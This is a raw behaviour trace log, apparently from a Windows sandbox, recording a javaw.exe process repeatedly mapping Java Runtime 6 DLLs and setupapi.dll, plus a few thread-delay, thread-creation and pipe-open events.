Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118356583
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2118383694
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2118385022
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2118391000
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118391609
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118426692
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118427293
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2118454213
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2118455534
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2118461512
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118462119
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118491470
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118492068
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2118518478
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2118519836
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2118526211
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118526821
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118557091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118557689
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2118584471
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2118585888
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2118593010
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118593625
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118624068
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118624665
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2118651762
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2118653114
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2118659129
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118659737
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118688676
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118689274
Thread delayed Time: 0 TID: 9078 success or wait 2118700938
Thread delayed Time: 0 TID: 9078 success or wait 2118702953
Thread delayed Time: 0 TID: 9078 success or wait 2118703851
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2118720306
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2118721703
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2118727732
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118728340
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118759372
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118759948
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118787176
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118787747
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118815582
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118816158
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2118841679
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2118843039
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2118849241
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118849830
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118879170
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118879800
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2118906061
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2118907343
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2118913091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118913677
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118941760
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119297541
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2119323883
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2119325163
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2119330943
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119331760
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119626168
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119626778
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2119653840
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2119655239
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2119661215
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119661826
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119690843
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119691443
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2119725704
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2119726987
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2119732966
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119733578
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119763015
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119763633
Thread delayed Time: 0 TID: 9078 success or wait 2119818948
Thread delayed Time: 0 TID: 9078 success or wait 2119820371
Thread delayed Time: 0 TID: 9078 success or wait 2119821729
Thread delayed Time: 0 TID: 9078 success or wait 2120937572
Thread delayed Time: 0 TID: 9078 success or wait 2120938752
Thread delayed Time: 0 TID: 9078 success or wait 2120939992
Thread delayed Time: 0 TID: 9078 success or wait 2122055832
Thread delayed Time: 0 TID: 9078 success or wait 2122057143
Thread created PID: 508 TID: 2732 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2210427760
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2210562047
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2230741966
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid object name not found 2230742969
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2230744683
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2231977943
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2231979705
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2251970923
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2251971714
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2251977617
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2251978216
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2252017306
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2252017919
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2253145327
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2253147694
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2253164856
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253166537
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253262436
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253264124
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2253338290
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2253340465
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2253357210
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253358873
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253404684
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253406326
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2253482226
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2253484486
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2253501560
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253503209
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253609152
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253610786
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2253702018
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2253704323
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2253724430
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253726020
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253813925
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253815662
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2253889508
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2253891664
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2253908363
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253910103
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253981984
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253983617
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2254015659
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2254016426
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2254022225
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254022814
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254048993
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254049592
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2254075366
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2254076174
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2254082181
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254082771
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254109347
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254109929
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2254135691
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2254136499
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2254142316
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254142905
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254168135
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254168716
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2254194428
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2254195213
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2254201029
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254201619
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254231024
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254231609
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254258427
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254259004
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254538696
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254539722
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2254567308
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2254568112
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2254574208
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254574839
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254601739
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254602359
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2254634971
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2254635771
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2254641923
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254642536
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254670009
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254670615
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2254697850
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2254698688
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2254704733
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254705344
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254732959
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254733564
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2254760403
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2254761242
